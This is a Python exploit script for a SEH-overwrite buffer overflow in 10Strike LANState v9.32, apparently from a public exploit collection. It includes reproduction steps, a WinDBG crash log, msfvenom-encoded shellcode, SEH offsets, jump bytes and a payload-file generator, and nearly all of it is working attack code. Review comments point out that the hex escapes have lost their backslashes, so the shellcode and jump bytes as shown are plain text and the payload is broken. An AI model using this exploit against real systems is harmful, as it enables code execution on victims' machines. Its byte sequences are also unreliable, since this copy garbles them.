#!/usr/bin/python

# Exploit Title: 10Strike LANState - Host Check hostname Buffer Overflow (SEH)
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Date: 2020-04-01
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Force Check" option when listing the Host Checks in the "Check List" option. Entering an overly long string results in a crash that overwrites SEH.

# Reproduction:
# - Use the indicated OS or adjust the settings: your mileage may vary because offsets differ on other Windows versions / service packs.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Rightclick on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results

# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???

import sys,struct

# Output file that receives the generated string (see "Reproduction" above).
filename = "10_strike_lanstate-poc.txt"

# Total length of the generated string; the trailing filler pads up to this.
maxlen = 10000

# Shellcode, using alphanumeric chars because bytes above 0x7f are considered bad
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
# NOTE(review): as rendered in this copy the "\x.." escapes have lost their
# backslashes, so this and the other quoted byte sequences below are plain
# ASCII text rather than the raw bytes the surrounding comments describe.
shellcode = (
"xdbxdcxd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx78x68x6dx52x65x50x37x70x77x70x43x50x4dx59"
"x39x75x36x51x59x50x32x44x6ex6bx32x70x46x50x6e"
"x6bx70x52x34x4cx6ex6bx61x42x45x44x4cx4bx54x32"
"x47x58x36x6fx6ex57x53x7ax66x46x46x51x79x6fx4e"
"x4cx37x4cx51x71x53x4cx44x42x44x6cx61x30x4ax61"
"x68x4fx66x6dx73x31x49x57x59x72x58x72x30x52x56"
"x37x4ex6bx52x72x34x50x6cx4bx33x7ax35x6cx6cx4b"
"x42x6cx57x61x74x38x6dx33x33x78x77x71x4bx61x32"
"x71x6ex6bx51x49x77x50x76x61x6ax73x6ex6bx61x59"
"x67x68x79x73x57x4ax42x69x4ex6bx37x44x6cx4bx43"
"x31x4ex36x45x61x6bx4fx6cx6cx6ax61x48x4fx34x4d"
"x47x71x5ax67x37x48x39x70x62x55x4bx46x65x53x63"
"x4dx39x68x67x4bx73x4dx46x44x53x45x79x74x76x38"
"x4cx4bx63x68x66x44x43x31x48x53x72x46x4ex6bx76"
"x6cx70x4bx4ex6bx61x48x57x6cx46x61x79x43x6cx4b"
"x54x44x6ex6bx57x71x68x50x6ex69x30x44x76x44x45"
"x74x53x6bx61x4bx65x31x62x79x31x4ax30x51x39x6f"
"x59x70x63x6fx71x4fx50x5ax6cx4bx56x72x4ax4bx6c"
"x4dx73x6dx30x6ax77x71x6ex6dx4dx55x4ex52x37x70"
"x75x50x63x30x52x70x63x58x56x51x4ex6bx42x4fx4e"
"x67x69x6fx49x45x4dx6bx58x70x4dx65x6dx72x50x56"
"x75x38x6ex46x6fx65x6fx4dx6dx4dx39x6fx58x55x75"
"x6cx63x36x73x4cx76x6ax6bx30x59x6bx4dx30x52x55"
"x74x45x6fx4bx43x77x42x33x63x42x62x4fx51x7ax77"
"x70x73x63x69x6fx58x55x72x43x30x61x72x4cx31x73"
"x46x4ex45x35x63x48x63x55x47x70x41x41"
)

# Offsets (in bytes) into the input string. How they were derived is not
# shown here; presumably from the crash analysis in the header. crash_ebp
# is not referenced anywhere below.
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4 # SEH handler slot follows NSEH by 4 bytes

# Variables
nops = "x90" * 16 # Nops (see NOTE(review) above: literal text in this copy)

# Prefix
prefix = "A" * crash_nseh # Filler up to the NSEH offset
nseh = "x71x06x70x04" # JNO # JO # Jump over NSEH/SEH
seh = struct.pack("<L", 0x0132730f) # call dword ptr ss:[ebp-04] # [LANState.exe]
suffix = nops # Old-school NOP'ing
suffix += shellcode # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler so the total reaches maxlen

# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together

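# Write the generated string to `filename` and report the outcome.
# Changes from the original: a context manager closes the handle even if the
# write fails; the local no longer shadows the builtin `file`; only I/O errors
# are caught (a bare `except` also hid programming errors such as NameError);
# the error detail is printed; and the process exits non-zero on failure so a
# calling shell can tell success from failure.
try:
    with open(filename, "wb") as out:
        out.write(payload)
except (IOError, OSError) as exc:
    print("[!] Error creating file!")
    print("    " + str(exc))
    sys.exit(1)
else:
    print("[+] File " + filename + " with size " + str(len(payload)) + " created successfully")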